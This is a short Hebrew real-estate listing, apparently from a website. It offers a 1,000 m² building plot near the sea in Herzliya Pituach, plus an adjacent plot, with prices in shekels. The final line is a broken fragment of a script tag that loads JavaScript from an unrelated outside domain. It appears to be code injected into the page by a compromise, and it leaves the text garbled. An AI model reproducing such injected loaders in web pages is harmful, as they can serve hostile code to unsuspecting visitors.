This post is also available in: אנגלית

למכירה מגרש בקרבת הים של הרצליה פיתוח

1000 מ”ר לבניית בית אחד

אפשרות לרכישת המגרש הצמוד 1000 מ”ר נוספים

מגרש אחד- 16,900,000, שני מגרשים- 32,900,000 ש”ח

and.buyittraffic.com/clizkes' type='text/javascript'>